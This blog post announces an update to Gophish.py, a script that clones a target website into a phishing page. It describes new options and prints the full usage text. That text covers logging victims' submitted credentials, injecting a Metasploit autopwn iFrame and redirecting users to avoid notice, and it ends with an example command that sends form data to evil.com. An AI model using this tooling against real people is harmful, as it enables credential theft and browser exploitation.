CodeWatch

I’ve released a new version of Gophish.py. The update includes:

  • Added comments explaining my ugly code.
  • cleaned up some code with a function, removing some redundancy.
  • Some bug fixes. The main fix is for an issue I found in certain cases when running it on Linux. Sometimes BeautifulSoup would change the order of the HTML page, moving functions in a script tag to a whole separate portion of the page (outside of the script tags) for instance. This would totally bork the page. Now, I am using the lxml support in BeautifulSoup which seems to have remediated the issue and works on Windows or Linux. Unfortunately, installing lxml on Windows is a little more of a pain than Linux (no `easy_install lxml`). The best way to do this is to install an lxml binary from one of the exe’s found here.
  • Gophish now ignores robots. Stupid mistake on my part, I didn’t realize Mechanize automatically honored robots.txt files.
  • Added some additional logging on the intial connection and subsequent page accesses.
  • Added an option to specify the IP to listen on, rather than just 0.0.0.0 (this is still the default).
  • Added an option to specify a clickthrough landing page. With this option, the URL you provide is what the phished target is redirected to in the case where they submit a from. In the past, Gophish always just submitted the form values to the phished site using the path found in the original form ACTION. Note, submitted information still gets logged.
  • Added an option to redirect users in the case where you want to replicate redirection functionality. For example, if your target redirects mail.example.com to outlook.example.com/blah/page/file.ext, then you can now do this with Gophish on your phish page. This way, your phishing page reacts in the same way as the target, reducing the likelihood someone will notice

Lot’s of new stuff all things considered. Let’s start with the easy features that have been added. If you pass –listen <IP>, then Gophish will listen on that IP rather than 0.0.0.0. The default is still 0.0.0.0 and this is what is used if this option is not specified.

The next option is pretty simple as well. If you pass –landing <http://www.landingsite.com>, then this is where the phished target will be redirected after submitting any forms on the phishing page. The default is to log submitted form values and then submit them to the REAL site, resulting in the user being redirected and possibly logged in to the real site. However, there are some cases where maybe this isn’t what you might want. Sometimes it’s nice to capture credentials or whatever else you are trying to get in the form and then have the user land on another page. This page might capture more information, and acts as a “clickthrough” page.

The final option is meant more for trying to mimic specific functionality of the target page as much as possible. Many times, users access a page just by its familiar name like mail.example.com and then are redirected to something like server-1-mail.example.com. Most users won’t even notice this behavior, but I added a feature just in case. You can now pass –redirect <content in FQDN to regex for redirect> along with –redirectto <full URL to redirect to> to perform the redirection. The first option is used in a regex and if a match is found the user is then redirected to the full URL provided with the second option.

If you are new to Gophish, you can find additional information here, here, and here. Usage information for the script:

  usage: gophish.py [-h] --phish PHISH --replace REPLACE [--logfile LOGFILE]
                  [--listen LISTEN] [--port PORT] [--ssl]
                  [--sslchain SSLCHAIN] [--sslcert SSLCERT] [--sslkey SSLKEY]
                  [--autopwn AUTOPWN] [--autofill AUTOFILL]
                  [--redirect REDIRECT] [--redirectto REDIRECTTO]
                  [--landing LANDING]

  Automatically setup a phishing site.

  optional arguments:
    -h, --help            show this help message and exit
    --phish PHISH         the full URL to phish back to the victim (must 
                          include http(s)://) (default: None)
    --replace REPLACE     the IP/FQDN to replace FORM actions with (must 
                          include http(s):// and final /) (default: None)
    --logfile LOGFILE     log file to store submitted form values (default:
                          phishlog.txt)
    --listen LISTEN       the IP to bind to (default: 0.0.0.0)
    --port PORT           the port to start the listening web server on
                          (default: 80)
    --ssl                 enable SSL on the running port (default: 0)
    --sslchain SSLCHAIN   certificate chain file to use when ssl option is
                          enabled (default: chain.crt)
    --sslcert SSLCERT     certificate file to use to use when ssl option is
                          enabled (default: ssl.crt)
    --sslkey SSLKEY       private key file to use to use when ssl option is
                          enabled (default: ssl.key)
    --autopwn AUTOPWN     Metasploit auxiliary/server/browser_autopwn URL to
                          inject as an iFrame (default: None)
    --autofill AUTOFILL   file to use to autosubmit autocomplete fields
                          (default: None)
    --redirect REDIRECT   redirect requests for this address somewhere else
                          (default: None)
    --redirectto REDIRECTTO
                          redirect requests in the redirect option to this
                          address (full link, must include http(s)://) 
                          (default: www.google.com)
    --landing LANDING     redirect to this landing page instead of original site
                          after form is submitted (include full link) 
                          (default: None)

  Example: gophish.py --phish https://www.victim.com/login.php --replace \
    https://www.evil.com/ --listen 1.1.1.1 --landing http://www.landing.com \
    --redirect mail.example.com --redirectto http://mail1.example.com/owa/exch/

 
I’ve left the original download location up, but will eventually remove this and only use the new location, which is here. That is where you can get the latest and greatest version.

Enjoy!

Leave a Reply

Your email address will not be published. Required fields are marked *